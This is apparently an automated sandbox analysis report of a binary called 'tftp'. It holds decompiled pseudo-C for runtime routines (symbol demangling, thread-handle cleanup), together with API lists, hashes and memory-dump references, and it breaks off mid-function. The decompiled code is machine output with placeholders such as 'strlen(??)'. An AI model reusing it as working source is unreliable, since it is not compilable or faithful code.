Opcode Fuzzy Hash: 2b145cbc16e31ded482a5c8feb2ed7f5c242e2784b1fbf9680b54a84af06034f
Instruction Fuzzy Hash: 404182B46047059FCB00EF29C4C069ABBE5EF85315F15492EE894C7341DB38D9C5CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF50, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 206
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040AF50(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
				void* _v16;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				signed int _v336;
				char _v340;
				char* _v344;
				intOrPtr _v348;
				char _v352;
				char* _v356;
				signed char* _v360;
				signed char _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v384;
				intOrPtr _v388;
				signed int _v392;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				signed int _t88;
				signed int _t90;
				void* _t96;
				void* _t99;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				int _t125;
				signed int _t128;
				signed int _t129;
				signed char* _t130;
				char* _t131;
				signed char* _t135;
				signed char* _t136;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				void* _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed char* _t162;
				void* _t163;
				signed char* _t165;
				void* _t169;
				void* _t170;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t175;
				void* _t183;

				_t88 = __eax;
				_t130 = __eax;
				_t171 = _t170 - 0x18c;
				_v384 = __edx;
				_t147 =  *__eax & 0x000000ff;
				_v388 = __ecx;
				_t175 = _t147 - 0x5f;
				if(_t175 == 0) {
					_t163 = 1;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L1;
					}
					L8:
					 *_t171 = _t130;
					_v392 = _t147;
					_t90 = strlen(??);
					_v372 = _t130;
					_v364 = 0x11;
					_v360 = _t130;
					_v352 = 0;
					_v340 = 0;
					_t141 = _t90;
					_v368 = _t130 + _t90;
					_v348 = _t141 + _t141;
					_v336 = _t141;
					_v332 = 0;
					_v328 = 0;
					_v324 = 0;
					_t96 = E0040CC90(0x00000012 + (_t141 + _t141 + _t141 * 0x00000004) * 0x00000004 & 0xfffffff0);
					_t99 = E0040CC90(0x00000012 + _t141 * 0x00000004 & 0xfffffff0);
					_t148 = _v392;
					_t173 = _t171 - _t96 - _t99;
					_t183 = _t163 - 1;
					_v356 =  &_v400;
					_v344 =  &_v400;
					if(_t183 == 0) {
						_t142 = 0;
						if(_t148 == 0x5f) {
							_t148 =  *(_t130 + 1) & 0x000000ff;
							_v360 = _t130 + 1;
							if(_t148 != 0x5a) {
								goto L20;
							}
							_v360 = _t130 + 2;
							_t133 =  &_v372;
							_t142 = E00405210( &_v372, 1);
							if((_v364 & 0x00000001) != 0) {
								while(1) {
									_t165 = _v360;
									_t148 =  *_t165 & 0x000000ff;
									if(_t148 != 0x2e) {
										goto L20;
									}
									_t112 = _t165[1] & 0x000000ff;
									_t85 = _t112 - 0x61; // -7
									if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
										_t142 = E00403B90(_t133, _t142);
										continue;
									} else {
										_t148 =  *_t165 & 0x000000ff;
										goto L20;
									}
								}
								goto L20;
							}
							_t148 =  *_v360 & 0x000000ff;
						}
						goto L20;
					} else {
						if(_t183 < 0 || _t163 > 3) {
							_t142 = E004048D0( &_v372);
							_t148 =  *_v360 & 0x000000ff;
						} else {
							_t162 = _t130 + 0xb;
							_v360 = _t162;
							if( *((char*)(_t130 + 0xb)) != 0x5f ||  *((char*)(_t130 + 0xc)) != 0x5a) {
								 *_t173 = _t162;
								_t134 =  &_v372;
								_t144 = E004039F0( &_v372, strlen(??), _t162);
							} else {
								_v360 = _t130 + 0xd;
								_t134 =  &_v372;
								_t144 = E00405210( &_v372, 0);
							}
							 *_t173 = 0;
							_t124 = E00403990(_t134, _t144, (0 | _t163 != 0x00000002) + 0x42);
							_t135 = _v360;
							 *_t173 = _t135;
							_v392 = _t124;
							_t125 = strlen(??);
							_t142 = _v392;
							_t136 = _t135 + _t125;
							_v360 = _t136;
							_t148 =  *_t136 & 0x000000ff;
						}
						L20:
						_t102 = 0;
						if(_t148 == 0 && _t142 != 0) {
							_t131 =  &_v320;
							_v64 = 0;
							_v60 = 0;
							_v48 = 0;
							_v56 = _v384;
							_v44 = 0;
							_v36 = 0;
							_v32 = 0;
							_v52 = _v388;
							_v40 = 0;
							E004063F0(_t131, _t142, 0x11);
							_t107 = _v64;
							 *_t173 = _t131;
							 *((char*)(_t169 + _t107 - 0x13c)) = 0;
							_v404 = _v52;
							_v408 = _t107;
							_v56();
							_t102 = 0 | _v40 == 0x00000000;
						}
						return _t102;
					}
				}
				L1:
				asm("repe cmpsb");
				_t140 = 0 | _t175 > 0x00000000;
				_t163 = 0;
				if(_t140 != (_t88 & 0xffffff00 | _t175 > 0x00000000)) {
					goto L8;
				}
				_t128 =  *(_t130 + 8) & 0x000000ff;
				if(_t128 == 0x2e || _t128 == 0x5f) {
					L4:
					_t129 =  *(_t130 + 9) & 0x000000ff;
					_t10 = _t129 == 0x49;
					_t145 = _t140 & 0xffffff00 | _t10;
					if(_t10 == 0) {
						L6:
						_t163 = 0;
						if( *((char*)(_t130 + 0xa)) == 0x5f) {
							_t163 = (_t145 << 0x1f >> 0x1f) + 3;
						}
						goto L8;
					}
					_t163 = 0;
					if(_t129 != 0x44) {
						goto L8;
					}
					goto L6;
				} else {
					if(_t128 != 0x24) {
						goto L8;
					}
					goto L4;
				}
			}

0x0040af50
0x0040af56
0x0040af58
0x0040af5e
0x0040af64
0x0040af67
0x0040af6d
0x0040af70
0x0040b114
0x0040b119
0x00000000
0x00000000
0x0040afc0
0x0040afc0
0x0040afc3
0x0040afc9
0x0040afce
0x0040afd4
0x0040afde
0x0040afe4
0x0040afee
0x0040aff8
0x0040affd
0x0040b006
0x0040b019
0x0040b01f
0x0040b029
0x0040b033
0x0040b03d
0x0040b052
0x0040b057
0x0040b05d
0x0040b05f
0x0040b066
0x0040b06c
0x0040b072
0x0040b125
0x0040b12a
0x0040b1f0
0x0040b1f7
0x0040b200
0x00000000
0x00000000
0x0040b20e
0x0040b214
0x0040b228
0x0040b22a
0x0040b24b
0x0040b24b
0x0040b251
0x0040b257
0x00000000
0x00000000
0x0040b25d
0x0040b261
0x0040b267
0x0040b249
0x00000000
0x0040b274
0x0040b274
0x00000000
0x0040b274
0x0040b267
0x00000000
0x0040b24b
0x0040b232
0x0040b232
0x00000000
0x0040b078
0x0040b078
0x0040b1cb
0x0040b1d3
0x0040b087
0x0040b08b
0x0040b08e
0x0040b094
0x0040b0a0
0x0040b0a3
0x0040b0b9
0x0040b280
0x0040b285
0x0040b28b
0x0040b298
0x0040b298
0x0040b0c8
0x0040b0cf
0x0040b0d4
0x0040b0da
0x0040b0dd
0x0040b0e3
0x0040b0e8
0x0040b0ee
0x0040b0f0
0x0040b0f6
0x0040b0f6
0x0040b130
0x0040b130
0x0040b134
0x0040b140
0x0040b14b
0x0040b152
0x0040b156
0x0040b15d
0x0040b166
0x0040b16d
0x0040b174
0x0040b17b
0x0040b180
0x0040b187
0x0040b18c
0x0040b192
0x0040b195
0x0040b19d
0x0040b1a1
0x0040b1a5
0x0040b1af
0x0040b1af
0x0040b1b9
0x0040b1b9
0x0040b072
0x0040af76
0x0040af82
0x0040af84
0x0040af8a
0x0040af8e
0x00000000
0x00000000
0x0040af90
0x0040af96
0x0040afa0
0x0040afa0
0x0040afa6
0x0040afa6
0x0040afa9
0x0040afb1
0x0040afb1
0x0040afb7
0x0040b1e8
0x0040b1e8
0x00000000
0x0040afb7
0x0040afab
0x0040afaf
0x00000000
0x00000000
0x00000000
0x0040b100
0x0040b102
0x00000000
0x00000000
0x00000000
0x0040b108

APIs

strlen.MSVCRT ref: 0040AFC9
strlen.MSVCRT ref: 0040B0A9
strlen.MSVCRT ref: 0040B0E3

Strings

Z__, xrefs: 0040B1B2
_GLOBAL_, xrefs: 0040AF7D
_, xrefs: 0040B087
_, xrefs: 0040AFB3
Z, xrefs: 0040B096

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_$_GLOBAL_
API String ID: 39653677-4292778781
Opcode ID: f00a63a26758aa9e8ced0454ff0cbdac067e1c01f4347638940a256fe1b1ed87
Instruction ID: d90bbefb1cfd777363be0848ace01259b3feabdcc99ef3b02b568dccaeea5df0
Opcode Fuzzy Hash: f00a63a26758aa9e8ced0454ff0cbdac067e1c01f4347638940a256fe1b1ed87
Instruction Fuzzy Hash: 6B817F71D043288BDB209F29C8947DBBBF1AB49344F4441BBD449AB386D7394E858F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF45, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 142
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040AF45(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
				void* _v16;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				signed int _v336;
				char _v340;
				char* _v344;
				intOrPtr _v348;
				char _v352;
				char* _v356;
				signed char* _v360;
				signed char _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v384;
				intOrPtr _v388;
				signed int _v392;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				signed int _t88;
				signed int _t90;
				void* _t96;
				void* _t99;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				int _t125;
				signed int _t128;
				signed int _t129;
				signed char* _t131;
				char* _t133;
				signed char* _t137;
				signed char* _t138;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				void* _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				signed char* _t166;
				void* _t168;
				signed char* _t171;
				void* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t181;
				void* _t183;
				void* _t191;

				_t88 = __eax;
				_t176 = _t178;
				_t131 = __eax;
				_t179 = _t178 - 0x18c;
				_v384 = __edx;
				_t149 =  *__eax & 0x000000ff;
				_v388 = __ecx;
				_t183 = _t149 - 0x5f;
				if(_t183 == 0) {
					_t168 = 1;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L2;
					}
					goto L9;
				} else {
					L2:
					asm("repe cmpsb");
					_t142 = 0 | _t183 > 0x00000000;
					_t168 = 0;
					if(_t142 != (_t88 & 0xffffff00 | _t183 > 0x00000000)) {
						L9:
						 *_t179 = _t131;
						_v392 = _t149;
						_t90 = strlen(??);
						_v372 = _t131;
						_v364 = 0x11;
						_v360 = _t131;
						_v352 = 0;
						_v340 = 0;
						_t143 = _t90;
						_v368 = _t131 + _t90;
						_v348 = _t143 + _t143;
						_v336 = _t143;
						_v332 = 0;
						_v328 = 0;
						_v324 = 0;
						_t96 = E0040CC90(0x00000012 + (_t143 + _t143 + _t143 * 0x00000004) * 0x00000004 & 0xfffffff0);
						_t99 = E0040CC90(0x00000012 + _t143 * 0x00000004 & 0xfffffff0);
						_t150 = _v392;
						_t181 = _t179 - _t96 - _t99;
						_t191 = _t168 - 1;
						_v356 =  &_v400;
						_v344 =  &_v400;
						if(_t191 == 0) {
							_t144 = 0;
							if(_t150 == 0x5f) {
								_t150 =  *(_t131 + 1) & 0x000000ff;
								_v360 = _t131 + 1;
								if(_t150 != 0x5a) {
									goto L21;
								}
								_v360 = _t131 + 2;
								_t135 =  &_v372;
								_t144 = E00405210( &_v372, 1);
								if((_v364 & 0x00000001) != 0) {
									while(1) {
										_t171 = _v360;
										_t150 =  *_t171 & 0x000000ff;
										if(_t150 != 0x2e) {
											goto L21;
										}
										_t112 = _t171[1] & 0x000000ff;
										_t85 = _t112 - 0x61; // -7
										if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
											_t144 = E00403B90(_t135, _t144);
											continue;
										} else {
											_t150 =  *_t171 & 0x000000ff;
											goto L21;
										}
									}
									goto L21;
								}
								_t150 =  *_v360 & 0x000000ff;
							}
							L21:
							_t102 = 0;
							if(_t150 == 0 && _t144 != 0) {
								_t133 =  &_v320;
								_v64 = 0;
								_v60 = 0;
								_v48 = 0;
								_v56 = _v384;
								_v44 = 0;
								_v36 = 0;
								_v32 = 0;
								_v52 = _v388;
								_v40 = 0;
								E004063F0(_t133, _t144, 0x11);
								_t107 = _v64;
								 *_t181 = _t133;
								 *((char*)(_t176 + _t107 - 0x13c)) = 0;
								_v404 = _v52;
								_v408 = _t107;
								_v56();
								_t102 = 0 | _v40 == 0x00000000;
							}
							return _t102;
						}
						if(_t191 < 0 || _t168 > 3) {
							_t144 = E004048D0( &_v372);
							_t150 =  *_v360 & 0x000000ff;
						} else {
							_t166 = _t131 + 0xb;
							_v360 = _t166;
							if( *((char*)(_t131 + 0xb)) != 0x5f ||  *((char*)(_t131 + 0xc)) != 0x5a) {
								 *_t181 = _t166;
								_t136 =  &_v372;
								_t146 = E004039F0( &_v372, strlen(??), _t166);
							} else {
								_v360 = _t131 + 0xd;
								_t136 =  &_v372;
								_t146 = E00405210( &_v372, 0);
							}
							 *_t181 = 0;
							_t124 = E00403990(_t136, _t146, (0 | _t168 != 0x00000002) + 0x42);
							_t137 = _v360;
							 *_t181 = _t137;
							_v392 = _t124;
							_t125 = strlen(??);
							_t144 = _v392;
							_t138 = _t137 + _t125;
							_v360 = _t138;
							_t150 =  *_t138 & 0x000000ff;
						}
						goto L21;
					}
					_t128 =  *(_t131 + 8) & 0x000000ff;
					if(_t128 == 0x2e || _t128 == 0x5f) {
						L5:
						_t129 =  *(_t131 + 9) & 0x000000ff;
						_t10 = _t129 == 0x49;
						_t147 = _t142 & 0xffffff00 | _t10;
						if(_t10 == 0) {
							L7:
							_t168 = 0;
							if( *((char*)(_t131 + 0xa)) == 0x5f) {
								_t168 = (_t147 << 0x1f >> 0x1f) + 3;
							}
							goto L9;
						}
						_t168 = 0;
						if(_t129 != 0x44) {
							goto L9;
						}
						goto L7;
					} else {
						if(_t128 != 0x24) {
							goto L9;
						}
						goto L5;
					}
				}
			}

0x0040af45
0x0040af51
0x0040af56
0x0040af58
0x0040af5e
0x0040af64
0x0040af67
0x0040af6d
0x0040af70
0x0040b114
0x0040b119
0x00000000
0x00000000
0x00000000
0x0040af76
0x0040af76
0x0040af82
0x0040af84
0x0040af8a
0x0040af8e
0x0040afc0
0x0040afc0
0x0040afc3
0x0040afc9
0x0040afce
0x0040afd4
0x0040afde
0x0040afe4
0x0040afee
0x0040aff8
0x0040affd
0x0040b006
0x0040b019
0x0040b01f
0x0040b029
0x0040b033
0x0040b03d
0x0040b052
0x0040b057
0x0040b05d
0x0040b05f
0x0040b066
0x0040b06c
0x0040b072
0x0040b125
0x0040b12a
0x0040b1f0
0x0040b1f7
0x0040b200
0x00000000
0x00000000
0x0040b20e
0x0040b214
0x0040b228
0x0040b22a
0x0040b24b
0x0040b24b
0x0040b251
0x0040b257
0x00000000
0x00000000
0x0040b25d
0x0040b261
0x0040b267
0x0040b249
0x00000000
0x0040b274
0x0040b274
0x00000000
0x0040b274
0x0040b267
0x00000000
0x0040b24b
0x0040b232
0x0040b232
0x0040b130
0x0040b130
0x0040b134
0x0040b140
0x0040b14b
0x0040b152
0x0040b156
0x0040b15d
0x0040b166
0x0040b16d
0x0040b174
0x0040b17b
0x0040b180
0x0040b187
0x0040b18c
0x0040b192
0x0040b195
0x0040b19d
0x0040b1a1
0x0040b1a5
0x0040b1af
0x0040b1af
0x0040b1b9
0x0040b1b9
0x0040b078
0x0040b1cb
0x0040b1d3
0x0040b087
0x0040b08b
0x0040b08e
0x0040b094
0x0040b0a0
0x0040b0a3
0x0040b0b9
0x0040b280
0x0040b285
0x0040b28b
0x0040b298
0x0040b298
0x0040b0c8
0x0040b0cf
0x0040b0d4
0x0040b0da
0x0040b0dd
0x0040b0e3
0x0040b0e8
0x0040b0ee
0x0040b0f0
0x0040b0f6
0x0040b0f6
0x00000000
0x0040b078
0x0040af90
0x0040af96
0x0040afa0
0x0040afa0
0x0040afa6
0x0040afa6
0x0040afa9
0x0040afb1
0x0040afb1
0x0040afb7
0x0040b1e8
0x0040b1e8
0x00000000
0x0040afb7
0x0040afab
0x0040afaf
0x00000000
0x00000000
0x00000000
0x0040b100
0x0040b102
0x00000000
0x00000000
0x00000000
0x0040b108
0x0040af96

APIs

strlen.MSVCRT ref: 0040AFC9
strlen.MSVCRT ref: 0040B0A9
strlen.MSVCRT ref: 0040B0E3

Strings

Z__, xrefs: 0040B1B2
_GLOBAL_, xrefs: 0040AF7D
_, xrefs: 0040B087
_, xrefs: 0040AFB3
Z, xrefs: 0040B096

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_$_GLOBAL_
API String ID: 39653677-4292778781
Opcode ID: 216206caca83ad1e192a8b7879c1ce6ca999981b85baf8b367ca5d34531b89d9
Instruction ID: 2c51368fa9d4a4e602010da2c97bb9331181bc01c75f139d51982d4ecda9cd98
Opcode Fuzzy Hash: 216206caca83ad1e192a8b7879c1ce6ca999981b85baf8b367ca5d34531b89d9
Instruction Fuzzy Hash: 53516CB19042188BDB20DF69C8943DEFBF1EF49304F4481AED458AB385D7794A898F85

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB10, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040EB10(void* __edx) {
				void* _t31;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t39;
				intOrPtr* _t45;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t61;
				void* _t64;
				void* _t71;
				void* _t84;
				void* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;

				_t71 = __edx;
				_t64 = _t85 + 0x10;
				_t31 = memcpy(_t64, 0x41432c, 4 << 2);
				_t86 = _t85 + 0xc;
				if(_t31 == 0 || _t31 != 3) {
					L2:
					return 1;
				} else {
					_t33 =  *0x41daf8;
					if(_t33 == 0) {
						_t33 = E0040D0A8();
						 *0x41daf8 = _t33;
					}
					if( *_t33 == 0xffffffff) {
						goto L2;
					} else {
						_t34 =  *0x41daf8;
						if(_t34 == 0) {
							_t34 = E0040D0A8();
							 *0x41daf8 = _t34;
						}
						 *_t86 =  *_t34;
						_t36 = TlsGetValue(??);
						_push(_t71);
						_t84 = _t36;
						if(_t36 == 0) {
							goto L2;
						} else {
							if(( *(_t36 + 0x20) & 0x00000030) != 0) {
								 *_t86 =  *((intOrPtr*)(_t36 + 0xbc));
								E0040E99C(0, _t71);
								_t39 =  *((intOrPtr*)(_t84 + 0x14));
								if(_t39 != 0) {
									 *_t86 = _t39;
									_push(CloseHandle(??));
									_t50 =  *((intOrPtr*)(_t84 + 0x18));
									if(_t50 != 0) {
										 *_t86 = _t50;
										_push(CloseHandle(??));
									}
									 *((intOrPtr*)(_t84 + 0x18)) = 0;
									 *((intOrPtr*)(_t84 + 0x14)) = 0;
								}
								goto L15;
							} else {
								_t53 =  *((intOrPtr*)(_t84 + 0x18));
								if( *((intOrPtr*)(_t36 + 0x70)) != 0) {
									if(_t53 != 0) {
										 *_t86 = _t53;
										CloseHandle(??);
										_push(0);
									}
									 *((intOrPtr*)(_t84 + 0x18)) = 0;
									goto L20;
								} else {
									if(_t53 != 0) {
										 *_t86 = _t53;
										CloseHandle(??);
										_push(0x414334);
									}
									 *((intOrPtr*)(_t84 + 0x18)) = 0;
									 *((intOrPtr*)(_t84 + 0x70)) = 1;
									 *_t86 =  *((intOrPtr*)(_t84 + 0xbc));
									E0040E99C(0, _t71);
									if(( *(_t84 + 0x24) & 0x00000004) == 0) {
										L20:
										_t22 = _t84 + 0x1c; // 0x1c
										 *_t86 = _t22;
										E00410BB4(0);
										_t23 = _t84 + 0x34; // 0x34
										memcpy(_t23, _t64, 4 << 2);
										return 1;
									} else {
										 *_t84 = 0xdeadbeef;
										_t61 =  *((intOrPtr*)(_t84 + 0x14));
										if(_t61 != 0) {
											 *_t86 = _t61;
											CloseHandle(??);
											_push(0x41432c);
										}
										 *((intOrPtr*)(_t84 + 0x14)) = 0;
										L15:
										_t17 = _t84 + 0x1c; // 0x1c
										 *_t86 = _t17;
										E00410BB4(0);
										_t18 = _t84 + 0x34; // 0x34
										memcpy(_t18, _t64, 4 << 2);
										_t87 = _t86 + 0xc;
										E0040D3AC(_t84, _t71);
										_t45 =  *0x41daf8;
										if(_t45 == 0) {
											_t45 = E0040D0A8();
											 *0x41daf8 = _t45;
										}
										 *((intOrPtr*)(_t87 + 4)) = 0;
										 *_t87 =  *_t45;
										TlsSetValue(??, ??);
										return 1;
									}
								}
							}
						}
					}
				}
			}

0x0040eb10
0x0040eb1b
0x0040eb2b
0x0040eb2b
0x0040eb2f
0x0040eb36
0x0040eb42
0x0040eb48
0x0040eb48
0x0040eb4f
0x0040ecb4
0x0040ecb9
0x0040ecb9
0x0040eb58
0x00000000
0x0040eb5a
0x0040eb5a
0x0040eb61
0x0040ecd4
0x0040ecd9
0x0040ecd9
0x0040eb69
0x0040eb6c
0x0040eb71
0x0040eb72
0x0040eb76
0x00000000
0x0040eb78
0x0040eb7c
0x0040ec72
0x0040ec75
0x0040ec7a
0x0040ec7f
0x0040ec85
0x0040ec8d
0x0040ec8e
0x0040ec93
0x0040ec95
0x0040ec9d
0x0040ec9d
0x0040ec9e
0x0040eca5
0x0040eca5
0x00000000
0x0040eb82
0x0040eb87
0x0040eb8a
0x0040ec32
0x0040ec34
0x0040ec37
0x0040ec3c
0x0040ec3c
0x0040ec3d
0x00000000
0x0040eb90
0x0040eb92
0x0040eb94
0x0040eb97
0x0040eb9c
0x0040eb9c
0x0040eb9d
0x0040eba4
0x0040ebb1
0x0040ebb4
0x0040ebbd
0x0040ec44
0x0040ec44
0x0040ec47
0x0040ec4a
0x0040ec4f
0x0040ec59
0x0040ec67
0x0040ebc3
0x0040ebc3
0x0040ebca
0x0040ebcf
0x0040ebd1
0x0040ebd4
0x0040ebd9
0x0040ebd9
0x0040ebda
0x0040ebe1
0x0040ebe1
0x0040ebe4
0x0040ebe7
0x0040ebec
0x0040ebf6
0x0040ebf6
0x0040ebfa
0x0040ebff
0x0040ec06
0x0040ecc4
0x0040ecc9
0x0040ecc9
0x0040ec0c
0x0040ec16
0x0040ec19
0x0040ec2d
0x0040ec2d
0x0040ebbd
0x0040eb8a
0x0040eb7c
0x0040eb76
0x0040eb58

APIs

TlsGetValue.KERNEL32 ref: 0040EB6C
CloseHandle.KERNEL32 ref: 0040EB97
CloseHandle.KERNEL32 ref: 0040EBD4
TlsSetValue.KERNEL32 ref: 0040EC19

Strings

,CA, xrefs: 0040EB1F

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CloseHandleValue
String ID: ,CA
API String ID: 492146193-345574230
Opcode ID: 6b102a88e992c525343c141ccca9a9d4c6942cd502b97070e5bfbf6c8cdc8387
Instruction ID: d2bee0cadff8691dcd871260427f8ff1b3f2bfd20380ab37db1e6c34b9131ba4
Opcode Fuzzy Hash: 6b102a88e992c525343c141ccca9a9d4c6942cd502b97070e5bfbf6c8cdc8387
Instruction Fuzzy Hash: 27414CB16082098BDB10EF7AD485B9A77E4AF40344F05083EE954EB381E77ED894D76D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECE4, Relevance: 10.6, APIs: 7, Instructions: 149threadCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32 ref: 0040ED41
GetCurrentThreadId.KERNEL32 ref: 0040ED49
_setjmp.MSVCRT ref: 0040ED68
CloseHandle.KERNEL32 ref: 0040EDDC
_endthreadex.MSVCRT ref: 0040EE3D

Part of subcall function 0040DF70: fprintf.MSVCRT ref: 0040DFB0

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CloseCurrentHandleThreadValue_endthreadex_setjmpfprintf
String ID:
API String ID: 4203901603-0
Opcode ID: ae4d5fa7e72a772a9cb55dd2fe8d02fc31dd0be671cd5154097c3c533ae0c8f8
Instruction ID: 531f4f8776346620d21c96f2241782fd1fb3ce869152a9902ebf38a79204c5af
Opcode Fuzzy Hash: ae4d5fa7e72a772a9cb55dd2fe8d02fc31dd0be671cd5154097c3c533ae0c8f8
Instruction Fuzzy Hash: 7E51FEB4A082059FDB00FF76C58565ABBE0AF44384F058C7EA8859B391DB38D991CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0FC, Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 118
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B0FC(void* __eax, signed char* __ebx, signed int __ecx, signed int __edx) {
				signed int _t81;
				signed int _t82;
				void* _t91;
				signed int _t94;
				signed char* _t99;
				signed int _t104;
				signed int _t116;
				int _t117;
				signed char* _t120;
				signed char* _t122;
				signed char* _t126;
				signed char* _t127;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int _t136;
				signed char* _t150;
				void* _t151;
				signed char* _t156;
				void* _t157;
				signed char** _t159;
				void* _t160;
				signed char** _t161;
				void* _t167;

				_t135 = __edx;
				_t120 = __ebx;
				if(__al == 0x24) {
					_t81 = __ebx[9] & 0x000000ff;
					_t3 = _t81 == 0x49;
					_t130 = __ecx & 0xffffff00 | _t3;
					if(_t3 == 0) {
						L3:
						_t151 = 0;
						if(_t120[0xa] == 0x5f) {
							_t151 = (_t130 << 0x1f >> 0x1f) + 3;
						}
					} else {
						_t151 = 0;
						if(_t81 == 0x44) {
							goto L3;
						}
					}
					L31:
				}
				 *_t159 = _t120;
				 *(_t157 - 0x184) = _t135;
				_t82 = strlen(??);
				 *(_t157 - 0x170) = _t120;
				 *(_t157 - 0x168) = 0x11;
				 *(_t157 - 0x164) = _t120;
				 *(_t157 - 0x15c) = 0;
				 *(_t157 - 0x150) = 0;
				_t131 = _t82;
				 *(_t157 - 0x16c) =  &(_t120[_t82]);
				 *((intOrPtr*)(_t157 - 0x158)) = _t131 + _t131;
				 *(_t157 - 0x14c) = _t131;
				 *(_t157 - 0x148) = 0;
				 *(_t157 - 0x144) = 0;
				 *(_t157 - 0x140) = 0;
				_t160 = _t159 - E0040CC90(0x00000012 + (_t131 + _t131 + _t131 * 0x00000004) * 0x00000004 & 0xfffffff0);
				_t91 = E0040CC90(0x00000012 + _t131 * 0x00000004 & 0xfffffff0);
				_t136 =  *(_t157 - 0x184);
				_t161 = _t160 - _t91;
				_t167 = _t151 - 1;
				 *((intOrPtr*)(_t157 - 0x160)) = _t160 + 0xc;
				 *(_t157 - 0x154) =  &(_t161[3]);
				if(_t167 == 0) {
					_t132 = 0;
					if(_t136 == 0x5f) {
						_t136 = _t120[1] & 0x000000ff;
						 *(_t157 - 0x164) =  &(_t120[1]);
						if(_t136 == 0x5a) {
							 *(_t157 - 0x164) =  &(_t120[2]);
							_t124 = _t157 - 0x170;
							_t132 = E00405210(_t157 - 0x170, 1);
							if(( *(_t157 - 0x168) & 0x00000001) != 0) {
								while(1) {
									_t156 =  *(_t157 - 0x164);
									_t136 =  *_t156 & 0x000000ff;
									if(_t136 != 0x2e) {
										goto L15;
									}
									_t104 = _t156[1] & 0x000000ff;
									_t77 = _t104 - 0x61; // -7
									if(_t77 <= 0x19 || _t104 == 0x5f || _t104 - 0x30 <= 9) {
										_t132 = E00403B90(_t124, _t132);
										continue;
									} else {
										_t136 =  *_t156 & 0x000000ff;
									}
									goto L15;
								}
							} else {
								_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
							}
						}
					}
				} else {
